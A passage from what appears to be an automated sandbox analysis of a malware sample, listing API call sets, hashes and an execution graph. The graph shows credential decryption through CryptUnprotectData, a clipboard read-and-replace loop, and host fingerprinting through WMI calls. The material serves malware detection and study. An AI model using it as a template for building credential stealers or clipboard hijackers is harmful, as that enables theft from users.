                                                                                              • __dosmaperr.LIBCMT ref: 6CE22FA6
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CE22FE5
                                                                                              • __dosmaperr.LIBCMT ref: 6CE22FEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                              • String ID:
                                                                                              • API String ID: 167067550-0
                                                                                              • Opcode ID: c30b69f66d4d6c494b616acb32daecbee48a485bd5dc2e52b2e458ccd4ec6b1e
                                                                                              • Instruction ID: dc5487761630d3c5e526ece63fe1ba3a31640e240e977fe221a544cb66b8424b
                                                                                              • Opcode Fuzzy Hash: c30b69f66d4d6c494b616acb32daecbee48a485bd5dc2e52b2e458ccd4ec6b1e
                                                                                              • Instruction Fuzzy Hash: F521F4716142096FEB208F668884F5BB7BDEF1537C7248618F82897B40D77DEC018BA0
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,6CE26B48,?,00000001,6CE24F54,?,6CE27002,00000001,?,?,?,6CE24EE3,?,00000000), ref: 6CE2283C
                                                                                              • _free.LIBCMT ref: 6CE22899
                                                                                              • _free.LIBCMT ref: 6CE228CF
                                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6CE27002,00000001,?,?,?,6CE24EE3,?,00000000,00000000,6CE2F360,0000002C,6CE24F54), ref: 6CE228DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_free
                                                                                              • String ID:
                                                                                              • API String ID: 2283115069-0
                                                                                              • Opcode ID: d03a8ed0e9cf7d44e3ca72d09b20f5297750e7803434a8a777a3bdfa13c78b8f
                                                                                              • Instruction ID: 035e5db1ce176887cfa519db6096fe7497fd8275d18a6550437a7604a18caf12
                                                                                              • Opcode Fuzzy Hash: d03a8ed0e9cf7d44e3ca72d09b20f5297750e7803434a8a777a3bdfa13c78b8f
                                                                                              • Instruction Fuzzy Hash: AF1102367606042ADB0652B59C8CF6B3379EFE267D7340229F62086BC0FF6CC8099260
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22993
                                                                                              • _free.LIBCMT ref: 6CE229F0
                                                                                              • _free.LIBCMT ref: 6CE22A26
                                                                                              • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6CE22DC8,6CE22E59,?,?,6CE2206C), ref: 6CE22A31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast_free
                                                                                              • String ID:
                                                                                              • API String ID: 2283115069-0
                                                                                              • Opcode ID: 6f12800d1daef58435bf04d689ccbc03e4cb6339df923cb4b97f9e917ccaefee
                                                                                              • Instruction ID: dfca575f8b82d32d8b167308ff6714ceea58ee5966d8ba4027b4d8fcb624175c
                                                                                              • Opcode Fuzzy Hash: 6f12800d1daef58435bf04d689ccbc03e4cb6339df923cb4b97f9e917ccaefee
                                                                                              • Instruction Fuzzy Hash: 031148367645042ACB0256B89C8CF5B3379AFE267C7340328F92082BC0FF2D8809A564
                                                                                              APIs
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001), ref: 6CE27DAD
                                                                                              • GetLastError.KERNEL32(?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?,00000001,?,6CE27023,6CE24EE3), ref: 6CE27DB9
                                                                                                • Part of subcall function 6CE27D7F: CloseHandle.KERNEL32(FFFFFFFE,6CE27DC9,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?,00000001), ref: 6CE27D8F
                                                                                              • ___initconout.LIBCMT ref: 6CE27DC9
                                                                                                • Part of subcall function 6CE27D41: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE27D70,6CE277DE,00000001,?,6CE26AD7,?,?,00000001,?), ref: 6CE27D54
                                                                                              • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE277F1,?,00000001,?,00000001,?,6CE26AD7,?,?,00000001,?), ref: 6CE27DDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                              • String ID:
                                                                                              • API String ID: 2744216297-0
                                                                                              • Opcode ID: a7bf9f3081f9236ade42816366d476db88f2f1e7547b7cd8d4decb15b3778b65
                                                                                              • Instruction ID: 412de0cac276560e900bbab95cbbd3293a961473709356f61037d1a1f6531560
                                                                                              • Opcode Fuzzy Hash: a7bf9f3081f9236ade42816366d476db88f2f1e7547b7cd8d4decb15b3778b65
                                                                                              • Instruction Fuzzy Hash: 54F0C036644128BBCF135FD6CC04F9A7FB6FF0B3A5B144114FA1995620DB7A8820EB95
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 6CE2216D
                                                                                                • Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
                                                                                                • Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B
                                                                                              • _free.LIBCMT ref: 6CE22180
                                                                                              • _free.LIBCMT ref: 6CE22191
                                                                                              • _free.LIBCMT ref: 6CE221A2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: c1d74eb37e5734801c70296b743e75e2f0b92deefa7753794346d83378d0fe42
                                                                                              • Instruction ID: 0eeeb112d88771d47e5f2b3e49a2d77c742f3ab5cd5f80047eb249287e262eea
                                                                                              • Opcode Fuzzy Hash: c1d74eb37e5734801c70296b743e75e2f0b92deefa7753794346d83378d0fe42
                                                                                              • Instruction Fuzzy Hash: E2E04F70720130BA8F13FF58E4448963B79BBAAF10310908AF4040AB10C7350313EFE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: C:\Users\user\Desktop\9cOUjp7ybm.exe
                                                                                              • API String ID: 0-3504642391
                                                                                              • Opcode ID: fd59b3e4c30bc45bb2fff6d13333369b14d4c2afacf7485425b64587442cf8ec
                                                                                              • Instruction ID: 3190cd138731894407f65150cce71d82e370f35e12e872825549ed26158f95b7
                                                                                              • Opcode Fuzzy Hash: fd59b3e4c30bc45bb2fff6d13333369b14d4c2afacf7485425b64587442cf8ec
                                                                                              • Instruction Fuzzy Hash: DC415071B00214ABDB12DB998980A9EBBBCEB86718B3000AAE40497750E7758F45CBA0
                                                                                              APIs
                                                                                                • Part of subcall function 6CE264A0: EnterCriticalSection.KERNEL32(00000001,?,6CE26EDF,?,6CE2F400,00000010,6CE24FF7,00000000,00000000,?,?,?,?,6CE2503B,?,00000000), ref: 6CE264BB
                                                                                              • FlushFileBuffers.KERNEL32(00000000,6CE2F3E0,0000000C,6CE266E8,TOl,?,00000001,?,6CE24F54,?), ref: 6CE2662A
                                                                                              • GetLastError.KERNEL32 ref: 6CE2663B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                              • String ID: TOl
                                                                                              • API String ID: 4109680722-2836345119
                                                                                              • Opcode ID: 0bb44cc026f98efc833940360436065f032c0bffc743eadd88eda4d2555cd70e
                                                                                              • Instruction ID: 0abe8bc5553a9260736b0ab305aeb1e1d495fd870a4dd9611bcdc3bcee3bd50b
                                                                                              • Opcode Fuzzy Hash: 0bb44cc026f98efc833940360436065f032c0bffc743eadd88eda4d2555cd70e
                                                                                              • Instruction Fuzzy Hash: 94015E72A10254DFCB019FA8D845B9DBBB8EF49728F24461EE411DB7A0DB7C99018B90

                                                                                              Execution Graph

                                                                                              Execution Coverage:11.2%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:27%
                                                                                              Total number of Nodes:355
                                                                                              Total number of Limit Nodes:23
                                                                                              execution_graph 13911 279dfbb 13912 279dfc1 13911->13912 13915 27a2120 13912->13915 13914 279dfca 13921 27a2139 13915->13921 13916 27a2140 13916->13914 13918 27a3e05 CreateThread 13918->13921 13919 27cbb30 RtlFreeHeap 13919->13921 13920 27a277b RtlExpandEnvironmentStrings 13920->13921 13921->13916 13921->13918 13921->13919 13921->13920 13922 27a2a7d RtlExpandEnvironmentStrings 13921->13922 13923 27cd760 LdrInitializeThunk 13921->13923 13926 279ae90 13921->13926 13930 27d0670 13921->13930 13934 27d0cd0 13921->13934 13922->13921 13923->13921 13927 279af20 13926->13927 13927->13927 13929 279af45 13927->13929 13940 27cd700 13927->13940 13929->13921 13931 27d0690 13930->13931 13931->13931 13932 27d07ae 13931->13932 13953 27cd760 LdrInitializeThunk 13931->13953 13932->13921 13935 27d0cf0 13934->13935 13935->13935 13938 27d0d2e 13935->13938 13954 27cd760 LdrInitializeThunk 13935->13954 13937 27d0dae 13937->13921 13938->13937 13955 27cd760 LdrInitializeThunk 13938->13955 13941 27cd718 13940->13941 13942 27cd73a 13940->13942 13943 27cd745 13940->13943 13944 27cd726 13940->13944 13941->13943 13941->13944 13945 27cbb10 RtlAllocateHeap 13942->13945 13949 27cbb30 13943->13949 13947 27cd72b RtlReAllocateHeap 13944->13947 13948 27cd740 13945->13948 13947->13948 13948->13929 13950 27cbb45 13949->13950 13951 27cbb43 13949->13951 13952 27cbb4a RtlFreeHeap 13950->13952 13951->13948 13952->13948 13953->13932 13954->13938 13955->13937 13762 27986f0 13764 27986ff 13762->13764 13763 2798a5e ExitProcess 13764->13763 13765 2798714 GetCurrentProcessId GetCurrentThreadId 13764->13765 13776 2798a50 13764->13776 13766 279873a 13765->13766 13767 279873e SHGetSpecialFolderPathW 13765->13767 13766->13767 13769 2798870 13767->13769 13769->13769 13779 27cbb10 13769->13779 13771 27988c0 GetForegroundWindow 13773 2798981 13771->13773 13774 2798a47 13773->13774 13782 279cad0 CoInitializeEx 13773->13782 13774->13776 13783 27cd6e0 13776->13783 13786 27cefb0 13779->13786 13781 27cbb1a RtlAllocateHeap 13781->13771 13788 27cef90 13783->13788 13785 27cd6e5 FreeLibrary 13785->13763 13787 27cefd0 13786->13787 13787->13781 13787->13787 13789 27cef99 13788->13789 13789->13785 13956 279a9b0 13959 279a9e0 13956->13959 13957 279ad04 13958 27cbb30 RtlFreeHeap 13958->13957 13959->13957 13959->13958 13959->13959 13790 27a5270 13791 27a5290 13790->13791 13791->13791 13813 27d0810 13791->13813 13793 27a53bd 13794 27a5403 13793->13794 13795 27a53e5 13793->13795 13802 27a5602 13793->13802 13808 27a5692 13793->13808 13812 27a544d 13793->13812 13817 27d0af0 13793->13817 13798 27a57bd 13794->13798 13794->13802 13794->13808 13794->13812 13821 27d0ba0 13794->13821 13797 27d0af0 LdrInitializeThunk 13795->13797 13797->13794 13799 27d0af0 LdrInitializeThunk 13798->13799 13803 27a5807 13798->13803 13807 27a5846 13798->13807 13798->13812 13799->13803 13802->13812 13828 27cd760 LdrInitializeThunk 13802->13828 13804 27d0ba0 LdrInitializeThunk 13803->13804 13806 27a58fe 13803->13806 13803->13807 13803->13812 13804->13807 13811 27a5bb3 CryptUnprotectData 13806->13811 13806->13812 13807->13806 13807->13812 13827 27cd760 LdrInitializeThunk 13807->13827 13808->13808 13809 27d0810 LdrInitializeThunk 13808->13809 13809->13798 13811->13806 13811->13812 13814 27d0830 13813->13814 13814->13814 13815 27d092e 13814->13815 13829 27cd760 LdrInitializeThunk 13814->13829 13815->13793 13819 27d0b10 13817->13819 13818 27d0b4e 13818->13795 13819->13818 13830 27cd760 LdrInitializeThunk 13819->13830 13823 27d0bc0 13821->13823 13822 27d0bfe 13824 27a543b 13822->13824 13832 27cd760 LdrInitializeThunk 13822->13832 13823->13822 13831 27cd760 LdrInitializeThunk 13823->13831 13824->13798 13824->13802 13824->13808 13824->13812 13827->13806 13828->13812 13829->13815 13830->13818 13831->13822 13832->13824 13833 27ce5f1 GetForegroundWindow 13837 27cf900 13833->13837 13835 27ce5ff GetForegroundWindow 13836 27ce610 13835->13836 13838 27cf910 13837->13838 13838->13835 13960 27ce232 13961 27ce260 13960->13961 13961->13961 13962 27ce2ee 13961->13962 13964 27cd760 LdrInitializeThunk 13961->13964 13964->13962 13965 27b2a28 13966 27b2a1d 13965->13966 13967 27b2b4b 13965->13967 13968 27b2a26 13965->13968 13967->13966 13969 27b2e70 13967->13969 13970 27b2db0 13967->13970 13968->13965 13968->13966 13968->13967 13971 27b30cb 13968->13971 13974 27b2970 13968->13974 13969->13966 13979 27cd760 LdrInitializeThunk 13969->13979 13970->13966 13981 27cd760 LdrInitializeThunk 13970->13981 13980 27cd760 LdrInitializeThunk 13971->13980 13978 27cd760 LdrInitializeThunk 13974->13978 13975 27b30f0 13978->13966 13979->13969 13980->13975 13981->13966 13982 4d31000 13983 4d31102 13982->13983 13984 4d31012 13982->13984 13985 4d31030 Sleep 13984->13985 13986 4d3103a OpenClipboard 13984->13986 13985->13984 13987 4d3104a GetClipboardData 13986->13987 13988 4d310f9 GetClipboardSequenceNumber 13986->13988 13989 4d310f3 CloseClipboard 13987->13989 13990 4d3105a GlobalLock 13987->13990 13988->13984 13989->13988 13990->13989 13991 4d3106b 13990->13991 13991->13991 13992 4d3108d GlobalAlloc 13991->13992 13993 4d310e9 GlobalUnlock 13992->13993 13994 4d3109d GlobalLock 13992->13994 13993->13989 13995 4d310b0 13994->13995 13996 4d310b9 GlobalUnlock 13995->13996 13997 4d310e0 GlobalFree 13996->13997 13998 4d310cb EmptyClipboard SetClipboardData 13996->13998 13997->13993 13998->13993 13998->13997 13999 27b002d 14000 27b00a8 13999->14000 14003 27a4760 14000->14003 14002 27b010f 14004 27a47a0 14003->14004 14004->14004 14005 27d0810 LdrInitializeThunk 14004->14005 14006 27a487c 14005->14006 14007 27d0810 LdrInitializeThunk 14006->14007 14008 27a4aab 14007->14008 14009 27a4b98 14008->14009 14010 27a4b4e 14008->14010 14013 27cbb10 RtlAllocateHeap 14008->14013 14022 27a4abc 14008->14022 14028 27a4c30 14008->14028 14012 27cbb30 RtlFreeHeap 14009->14012 14010->14009 14010->14022 14010->14028 14012->14022 14023 27a4acd 14013->14023 14016 27d0810 LdrInitializeThunk 14016->14022 14018 27d0af0 LdrInitializeThunk 14018->14022 14020 27d0ba0 LdrInitializeThunk 14020->14022 14022->14016 14022->14018 14022->14020 14024 27a5133 14022->14024 14025 27a516b 14022->14025 14030 27cbb60 14022->14030 14058 27cbda0 14022->14058 14062 27cbfb0 14022->14062 14070 27cbf20 14022->14070 14074 27cd760 LdrInitializeThunk 14022->14074 14023->14010 14040 27cd760 LdrInitializeThunk 14023->14040 14024->14002 14025->14024 14075 27cd760 LdrInitializeThunk 14025->14075 14028->14022 14029 27cd760 LdrInitializeThunk 14028->14029 14041 27c9460 14028->14041 14029->14028 14031 27cbb80 14030->14031 14032 27cbbbe 14031->14032 14076 27cd760 LdrInitializeThunk 14031->14076 14034 27cbb10 RtlAllocateHeap 14032->14034 14037 27cbd71 14032->14037 14035 27cbc64 14034->14035 14039 27cbcbe 14035->14039 14077 27cd760 LdrInitializeThunk 14035->14077 14036 27cbb30 RtlFreeHeap 14036->14037 14037->14022 14039->14036 14040->14010 14043 27c9470 14041->14043 14042 27cd700 3 API calls 14042->14043 14043->14042 14045 27c954c 14043->14045 14078 27cd760 LdrInitializeThunk 14043->14078 14047 27cbda0 LdrInitializeThunk 14045->14047 14051 27c984a 14045->14051 14046 27cbb30 RtlFreeHeap 14048 27c9863 14046->14048 14054 27c9592 14047->14054 14048->14028 14049 27c984e 14050 27cbf20 LdrInitializeThunk 14049->14050 14050->14051 14051->14046 14052 27cd700 3 API calls 14052->14054 14053 27cbb30 RtlFreeHeap 14053->14054 14054->14049 14054->14052 14054->14053 14055 27c9870 14054->14055 14056 27cd760 LdrInitializeThunk 14054->14056 14057 27cbb30 RtlFreeHeap 14055->14057 14056->14054 14057->14049 14059 27cbe52 14058->14059 14060 27cbdb2 14058->14060 14059->14022 14060->14059 14079 27cd760 LdrInitializeThunk 14060->14079 14063 27cbfc6 14062->14063 14067 27cc02a 14062->14067 14065 27cc028 14063->14065 14063->14067 14080 27cd760 LdrInitializeThunk 14063->14080 14064 27cc11e 14064->14067 14082 27cd760 LdrInitializeThunk 14064->14082 14065->14064 14065->14065 14081 27cd760 LdrInitializeThunk 14065->14081 14067->14022 14071 27cbf7e 14070->14071 14072 27cbf2a 14070->14072 14071->14022 14072->14071 14083 27cd760 LdrInitializeThunk 14072->14083 14074->14022 14075->14024 14076->14032 14077->14039 14078->14043 14079->14059 14080->14065 14081->14064 14082->14067 14083->14071 14084 27bce22 14086 27bce2e 14084->14086 14085 27bcebb GetComputerNameExA 14086->14085 14086->14086 14087 27bb421 14089 27bb450 14087->14089 14088 27bb53e 14089->14088 14091 27cd760 LdrInitializeThunk 14089->14091 14091->14088 14092 27b3e21 14093 27b3e2e 14092->14093 14096 27cfa60 14093->14096 14097 27cfa80 14096->14097 14098 27cfabe 14097->14098 14106 27cd760 LdrInitializeThunk 14097->14106 14099 27b3e52 14098->14099 14100 27cbb10 RtlAllocateHeap 14098->14100 14103 27cfb37 14100->14103 14102 27cbb30 RtlFreeHeap 14102->14099 14105 27cfb8f 14103->14105 14107 27cd760 LdrInitializeThunk 14103->14107 14105->14102 14105->14105 14106->14098 14107->14105 13839 27ce060 13841 27ce090 13839->13841 13840 27ce11e 13841->13840 13843 27cd760 LdrInitializeThunk 13841->13843 13843->13840 14108 27c7b21 GetUserDefaultUILanguage 14109 27c7b56 14108->14109 14110 279cb18 14111 279cb30 14110->14111 14116 27c8890 14111->14116 14113 279cc03 14114 27c8890 11 API calls 14113->14114 14115 279cdb3 14114->14115 14115->14115 14117 27c88c0 CoCreateInstance 14116->14117 14119 27c8bdd SysAllocString 14117->14119 14120 27c90a2 14117->14120 14123 27c8c51 14119->14123 14121 27c90b2 GetVolumeInformationW 14120->14121 14130 27c90cd 14121->14130 14124 27c908e SysFreeString 14123->14124 14125 27c8c59 CoSetProxyBlanket 14123->14125 14124->14120 14126 27c8c79 SysAllocString 14125->14126 14127 27c9084 14125->14127 14129 27c8d30 14126->14129 14127->14124 14129->14129 14131 27c8d46 SysAllocString 14129->14131 14130->14113 14133 27c8d6e 14131->14133 14132 27c906f SysFreeString SysFreeString 14132->14127 14133->14132 14134 27c9065 14133->14134 14135 27c8db2 VariantInit 14133->14135 14134->14132 14137 27c8e00 14135->14137 14136 27c9054 VariantClear 14136->14134 14137->14136 13844 279d45b 13845 279d470 13844->13845 13849 279d4be 13845->13849 13870 27cd760 LdrInitializeThunk 13845->13870 13846 279d53e 13866 27b3190 13846->13866 13849->13846 13871 27cd760 LdrInitializeThunk 13849->13871 13851 279d57d 13852 27b3a50 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13851->13852 13853 279d59d 13852->13853 13854 27b3cf0 RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13853->13854 13855 279d5bd 13854->13855 13856 27b6270 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13855->13856 13857 279d5e6 13856->13857 13858 27b6740 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 13857->13858 13859 279d5ef 13858->13859 13860 27b8fd0 RtlExpandEnvironmentStrings LdrInitializeThunk 13859->13860 13861 279d5f8 13860->13861 13862 27b8150 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 13861->13862 13863 279d618 13862->13863 13864 27c2490 6 API calls 13863->13864 13865 279d641 13864->13865 13867 27b31f0 13866->13867 13867->13867 13868 27b3219 RtlExpandEnvironmentStrings 13867->13868 13869 27b3260 13868->13869 13869->13869 13870->13849 13871->13846 14138 279d691 14141 27c2620 14138->14141 14142 27c264e GetSystemMetrics GetSystemMetrics 14141->14142 14143 27c2691 14142->14143 14144 27a8c90 14147 27a8c99 14144->14147 14145 27a8e04 14147->14145 14147->14147 14148 27d0980 14147->14148 14149 27d09a0 14148->14149 14150 27d0a9e 14149->14150 14152 27cd760 LdrInitializeThunk 14149->14152 14150->14145 14152->14150 14153 27b0990 14154 27b099e 14153->14154 14158 27b09f0 14153->14158 14159 27b0ab0 14154->14159 14156 27b0a6c 14157 27aecc0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14156->14157 14156->14158 14157->14158 14160 27b0ac0 14159->14160 14160->14160 14161 27d0980 LdrInitializeThunk 14160->14161 14162 27b0bcf 14161->14162 13877 27c86d0 13879 27c86e0 13877->13879 13878 27c882e 13881 27c874e 13879->13881 13886 27cd760 LdrInitializeThunk 13879->13886 13881->13878 13883 27c87ce 13881->13883 13885 27cd760 LdrInitializeThunk 13881->13885 13883->13878 13887 27cd760 LdrInitializeThunk 13883->13887 13885->13883 13886->13881 13887->13878 14163 27c100d 14166 27a4750 14163->14166 14165 27c1012 CoSetProxyBlanket 14166->14165 14167 279cf08 14168 279cf90 14167->14168 14169 279cfde 14168->14169 14173 27cd760 LdrInitializeThunk 14168->14173 14172 27cd760 LdrInitializeThunk 14169->14172 14172->14169 14173->14169 14174 279ea88 CoInitializeSecurity CoInitializeSecurity 14175 27b3288 14176 27b3290 14175->14176 14177 27b32a0 RtlExpandEnvironmentStrings 14176->14177 14178 27b32bf 14177->14178 14179 27d0980 LdrInitializeThunk 14178->14179 14180 27b3579 14178->14180 14181 27b3537 GetLogicalDrives 14178->14181 14179->14178 14182 27d0980 LdrInitializeThunk 14181->14182 14182->14178 13888 27cdb4b 13890 27cda76 13888->13890 13889 27cdbd3 13890->13889 13893 27cd760 LdrInitializeThunk 13890->13893 13892 27cdbf4 13893->13892 14183 27bdc02 CoSetProxyBlanket 14184 27bcc80 14185 27bcc8c 14184->14185 14185->14185 14186 27bcce5 FreeLibrary 14185->14186 14188 27bccf2 14186->14188 14187 27bcdd5 GetComputerNameExA 14189 27bce1e 14187->14189 14188->14187 14188->14188 14189->14189 13894 279d6c5 13900 2799710 13894->13900 13896 279d6d1 CoUninitialize 13897 279d6f0 13896->13897 13898 279dae7 CoUninitialize 13897->13898 13899 279db10 13898->13899 13901 2799724 13900->13901 13901->13896 14190 27cd700 14191 27cd718 14190->14191 14192 27cd73a 14190->14192 14193 27cd745 14190->14193 14194 27cd726 14190->14194 14191->14193 14191->14194 14195 27cbb10 RtlAllocateHeap 14192->14195 14196 27cbb30 RtlFreeHeap 14193->14196 14197 27cd72b RtlReAllocateHeap 14194->14197 14198 27cd740 14195->14198 14196->14198 14197->14198 13902 27baf45 13903 27baf70 13902->13903 13903->13903 13904 27bb02a GetPhysicallyInstalledSystemMemory 13903->13904 13905 27bb060 13904->13905 13905->13905 13906 27cd943 13907 27cd960 13906->13907 13910 27cd760 LdrInitializeThunk 13907->13910 13909 27cda1f 13910->13909
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.2941096570.0000000002791000.00000020.00000400.00020000.00000000.sdmp, Offset: 02790000, based on PE: true
                                                                                              • Associated: 00000002.00000002.2941082151.0000000002790000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941165293.00000000027D1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941180919.00000000027D4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.2941195893.00000000027E2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_2790000_aspnet_regiis.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$!$!$#$#$$$%$%$%$%$'$'$'$($($)$)$+$-$/$1$3$3$4$5$6$6$7$8$9$9$:$:$;$;$<$=$=$?$A$C$D$D$D$I$I$J$K$M$O$Q$Q$S$U$W$\$]$`$a$g$i$i$k$o$p$q$v$x$y${$}
                                                                                              • API String ID: 0-2157806064
                                                                                              • Opcode ID: f4c4cb05a5163970f4d8e5b738e630a31ffaeb8cc8e52eba09b61fdb5094d6f3
                                                                                              • Instruction ID: c03868e0b341892a98068d7559529917e02e8a1b6fe39c066d9bdb7be5d17c4b
                                                                                              • Opcode Fuzzy Hash: f4c4cb05a5163970f4d8e5b738e630a31ffaeb8cc8e52eba09b61fdb5094d6f3
